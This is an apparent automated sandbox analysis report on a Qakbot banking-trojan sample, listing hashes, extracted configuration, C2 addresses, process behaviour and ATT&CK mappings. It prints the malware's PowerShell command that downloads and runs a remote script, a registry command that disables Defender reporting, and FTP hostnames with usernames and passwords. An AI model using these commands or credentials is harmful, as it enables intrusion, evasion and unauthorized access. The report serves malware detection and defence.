qakbot | 6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

General

Target

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
Size

397KB
MD5

a0a9bf99af2c13b678a17f3f7f8b73c8
SHA1

802b22bdd827d1921534d93d31e9df2735156210
SHA256

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80
SHA512

3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Score

10^/10

qakbot 1518695014 banker persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.allens-treasure-house.com/books_files/001.ps1

Extracted

Family

qakbot

Version

322.148

Campaign

1518695014

Credentials

Protocol: ftp
Host:
66.96.133.9
Port:
21
Username:
help
Password:
eT5TerAcnFe6~

Protocol: ftp
Host:
174.123.38.58
Port:
21
Username:
[email protected]
Password:
4BQ1MeeRAwNZEVu

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

C2

179.62.153.88:443

50.198.141.161:2222

69.129.91.38:443

66.189.228.49:995

96.253.104.73:443

71.183.129.113:443

125.25.130.203:995

173.175.174.154:443

162.104.186.175:995

75.109.222.140:995

68.173.55.51:443

78.175.254.43:443

106.159.251.143:995

47.143.83.172:443

71.190.202.120:443

73.136.232.174:995

96.253.104.73:995

192.158.217.32:22

65.153.16.250:993

70.95.129.59:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 1468 powershell.exe
6 1468 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

cilydi.execilydi.exe

pid process

948 cilydi.exe
820 cilydi.exe

flow	pid	process
5	1468	powershell.exe
6	1468	powershell.exe

pid	process
948	cilydi.exe
820	cilydi.exe

Loads dropped DLL 3 IoCs

Processes:

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.execilydi.exe

pid	process
1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
948	cilydi.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\nvdwj = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Cilydii\\cilydi.exe\""	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2000 PING.EXE

pid	process
2000	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.execilydi.execilydi.exepowershell.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEconhost.execmd.execonhost.exePING.EXE

pid	process
1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
1268	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
1268	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
948	cilydi.exe
820	cilydi.exe
1468	powershell.exe
820	cilydi.exe
536	explorer.exe
1232	taskhost.exe
1332	Dwm.exe
536	explorer.exe
1416	Explorer.EXE
1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
1468	powershell.exe
556	conhost.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
1976	cmd.exe
1296	conhost.exe
2000	PING.EXE
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe
536	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1416 Explorer.EXE
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

cilydi.exe

pid process

948 cilydi.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1468 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

1416 Explorer.EXE
1416 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

1416 Explorer.EXE
1416 Explorer.EXE

pid	process
1416	Explorer.EXE

pid	process
948	cilydi.exe

description	pid	process
Token: SeDebugPrivilege	1468	powershell.exe

pid	process
1416	Explorer.EXE
1416	Explorer.EXE

pid	process
1416	Explorer.EXE
1416	Explorer.EXE

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.execilydi.exeexplorer.execmd.exe

description	pid	process	target process
PID 1668 wrote to memory of 1268	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 1668 wrote to memory of 1268	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 1668 wrote to memory of 1268	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 1668 wrote to memory of 1268	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 1668 wrote to memory of 948	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cilydi.exe
PID 1668 wrote to memory of 948	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cilydi.exe
PID 1668 wrote to memory of 948	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cilydi.exe
PID 1668 wrote to memory of 948	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cilydi.exe
PID 1668 wrote to memory of 760	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	reg.exe
PID 1668 wrote to memory of 760	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	reg.exe
PID 1668 wrote to memory of 760	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	reg.exe
PID 1668 wrote to memory of 760	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	reg.exe
PID 1668 wrote to memory of 1468	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	powershell.exe
PID 1668 wrote to memory of 1468	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	powershell.exe
PID 1668 wrote to memory of 1468	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	powershell.exe
PID 1668 wrote to memory of 1468	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	powershell.exe
PID 948 wrote to memory of 820	948	cilydi.exe	cilydi.exe
PID 948 wrote to memory of 820	948	cilydi.exe	cilydi.exe
PID 948 wrote to memory of 820	948	cilydi.exe	cilydi.exe
PID 948 wrote to memory of 820	948	cilydi.exe	cilydi.exe
PID 948 wrote to memory of 536	948	cilydi.exe	explorer.exe
PID 948 wrote to memory of 536	948	cilydi.exe	explorer.exe
PID 948 wrote to memory of 536	948	cilydi.exe	explorer.exe
PID 948 wrote to memory of 536	948	cilydi.exe	explorer.exe
PID 948 wrote to memory of 536	948	cilydi.exe	explorer.exe
PID 536 wrote to memory of 1232	536	explorer.exe	taskhost.exe
PID 536 wrote to memory of 1232	536	explorer.exe	taskhost.exe
PID 536 wrote to memory of 1232	536	explorer.exe	taskhost.exe
PID 536 wrote to memory of 1332	536	explorer.exe	Dwm.exe
PID 536 wrote to memory of 1332	536	explorer.exe	Dwm.exe
PID 536 wrote to memory of 1332	536	explorer.exe	Dwm.exe
PID 536 wrote to memory of 1416	536	explorer.exe	Explorer.EXE
PID 536 wrote to memory of 1416	536	explorer.exe	Explorer.EXE
PID 536 wrote to memory of 1416	536	explorer.exe	Explorer.EXE
PID 536 wrote to memory of 1668	536	explorer.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 536 wrote to memory of 1668	536	explorer.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 536 wrote to memory of 1668	536	explorer.exe	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
PID 536 wrote to memory of 1468	536	explorer.exe	powershell.exe
PID 536 wrote to memory of 1468	536	explorer.exe	powershell.exe
PID 536 wrote to memory of 1468	536	explorer.exe	powershell.exe
PID 536 wrote to memory of 556	536	explorer.exe	conhost.exe
PID 536 wrote to memory of 556	536	explorer.exe	conhost.exe
PID 536 wrote to memory of 556	536	explorer.exe	conhost.exe
PID 1668 wrote to memory of 1976	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cmd.exe
PID 1668 wrote to memory of 1976	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cmd.exe
PID 1668 wrote to memory of 1976	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cmd.exe
PID 1668 wrote to memory of 1976	1668	6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe	cmd.exe
PID 1976 wrote to memory of 2000	1976	cmd.exe	PING.EXE
PID 1976 wrote to memory of 2000	1976	cmd.exe	PING.EXE
PID 1976 wrote to memory of 2000	1976	cmd.exe	PING.EXE
PID 1976 wrote to memory of 2000	1976	cmd.exe	PING.EXE
PID 536 wrote to memory of 1976	536	explorer.exe	cmd.exe
PID 536 wrote to memory of 1976	536	explorer.exe	cmd.exe
PID 536 wrote to memory of 1976	536	explorer.exe	cmd.exe
PID 536 wrote to memory of 1296	536	explorer.exe	conhost.exe
PID 536 wrote to memory of 1296	536	explorer.exe	conhost.exe
PID 536 wrote to memory of 1296	536	explorer.exe	conhost.exe
PID 536 wrote to memory of 2000	536	explorer.exe	PING.EXE
PID 536 wrote to memory of 2000	536	explorer.exe	PING.EXE
PID 536 wrote to memory of 2000	536	explorer.exe	PING.EXE

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1232

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1332

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1416

C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
"C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1668

C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe
"C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe" /C
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1268

C:\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:948

C:\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe" /C
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:820

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:536

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\qdgsbkqvfmmvtltrxyylcgwpmkyj.txt'"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
PID:2000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1604812151-116858612-6374852191780005511-1918819919-115004772283493839-961849264"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:556

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2073767898-354561141-15242057708040132714776455683301706687274541491827417557"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1296

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilyd.dat
MD5
b2927c8c070e7c1a8d8c993419d3de79

SHA1
d8c085b806b946f0f2dba21856474bc3f3f4ccdb

SHA256
601525942ca4f0f63cc04efccd06d5a0a8a138d465dfed3e615376e7387b40dd

SHA512
2d7b87a691aa67e36428f20550b9f7a524aca4ff17f8945c4dccea65f23acbb73d2f6f24df5c408651609dd8696d729397d9d52f86b440085fc3cd6bd9db6902

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Cilydii\cilydi.exe
MD5
a0a9bf99af2c13b678a17f3f7f8b73c8

SHA1
802b22bdd827d1921534d93d31e9df2735156210

SHA256
6347cd969b7f0837f608068b4f32c6513a1459ef60cd80a066d70225b40c1a80

SHA512
3d7f7ab8f09a65ea0c0908fb747ce07228b0d750b66b4412a5ef7a4a12f6edad013dccceaa1d412392ba8c42e51226ce17392c43923bc3626d88a1eb9d7ba415

Download Submit
memory/536-107-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/536-83-0x00000000000D0000-0x0000000000138000-memory.dmp

Filesize
416KB

Download
memory/536-128-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

Filesize
4KB

Download
memory/536-112-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/536-108-0x0000000000C20000-0x0000000000C21000-memory.dmp

Filesize
4KB

Download
memory/536-106-0x0000000000C00000-0x0000000000C01000-memory.dmp

Filesize
4KB

Download
memory/536-72-0x0000000074771000-0x0000000074773000-memory.dmp

Filesize
8KB

Download
memory/536-96-0x0000000000B70000-0x0000000000B71000-memory.dmp

Filesize
4KB

Download
memory/536-95-0x00000000003A0000-0x00000000003CF000-memory.dmp

Filesize
188KB

Download
memory/536-89-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/536-84-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/556-113-0x00000000001A0000-0x00000000001CC000-memory.dmp

Filesize
176KB

Download
memory/1232-85-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/1232-76-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/1232-87-0x0000000077481000-0x0000000077482000-memory.dmp

Filesize
4KB

Download
memory/1232-88-0x0000000077200000-0x0000000077201000-memory.dmp

Filesize
4KB

Download
memory/1232-86-0x00000000001F0000-0x000000000021C000-memory.dmp

Filesize
176KB

Download
memory/1232-74-0x00000000001F0000-0x000000000021C000-memory.dmp

Filesize
176KB

Download
memory/1232-75-0x0000000000220000-0x000000000024D000-memory.dmp

Filesize
180KB

Download
memory/1296-129-0x0000000000240000-0x000000000026C000-memory.dmp

Filesize
176KB

Download
memory/1296-130-0x0000000077200000-0x0000000077201000-memory.dmp

Filesize
4KB

Download
memory/1332-90-0x00000000001A0000-0x00000000001CC000-memory.dmp

Filesize
176KB

Download
memory/1332-92-0x0000000077200000-0x0000000077201000-memory.dmp

Filesize
4KB

Download
memory/1416-102-0x0000000077200000-0x0000000077201000-memory.dmp

Filesize
4KB

Download
memory/1416-101-0x00000000025F0000-0x000000000261C000-memory.dmp

Filesize
176KB

Download
memory/1468-69-0x0000000002632000-0x0000000002634000-memory.dmp

Filesize
8KB

Download
memory/1468-68-0x000000000263B000-0x000000000265A000-memory.dmp

Filesize
124KB

Download
memory/1468-60-0x000007FEFBCB1000-0x000007FEFBCB3000-memory.dmp

Filesize
8KB

Download
memory/1468-65-0x000007FEF2D80000-0x000007FEF38DD000-memory.dmp

Filesize
11.4MB

Download
memory/1468-67-0x0000000002630000-0x0000000002632000-memory.dmp

Filesize
8KB

Download
memory/1468-70-0x0000000002634000-0x0000000002637000-memory.dmp

Filesize
12KB

Download
memory/1468-66-0x000007FEF54AE000-0x000007FEF54AF000-memory.dmp

Filesize
4KB

Download
memory/1468-110-0x0000000077200000-0x0000000077201000-memory.dmp

Filesize
4KB

Download
memory/1468-109-0x000000001B660000-0x000000001B68C000-memory.dmp

Filesize
176KB

Download
memory/1468-111-0x000007FEFE3F0000-0x000007FEFE3F1000-memory.dmp

Filesize
4KB

Download
memory/1668-54-0x0000000075F81000-0x0000000075F83000-memory.dmp

Filesize
8KB

Download
memory/1668-100-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1668-97-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/1668-99-0x0000000077630000-0x0000000077631000-memory.dmp

Filesize
4KB

Download
memory/1668-98-0x00000000005E0000-0x0000000000607000-memory.dmp

Filesize
156KB

Download
memory/1976-114-0x0000000000730000-0x0000000000757000-memory.dmp

Filesize
156KB

Download
memory/1976-115-0x0000000000760000-0x0000000000788000-memory.dmp

Filesize
160KB

Download
memory/1976-119-0x0000000077630000-0x0000000077631000-memory.dmp

Filesize
4KB

Download
memory/1976-118-0x0000000000730000-0x0000000000757000-memory.dmp

Filesize
156KB

Download
memory/1976-120-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/2000-131-0x0000000000160000-0x0000000000187000-memory.dmp

Filesize
156KB

Download
memory/2000-132-0x0000000077630000-0x0000000077631000-memory.dmp

Filesize
4KB

Download
memory/2000-133-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads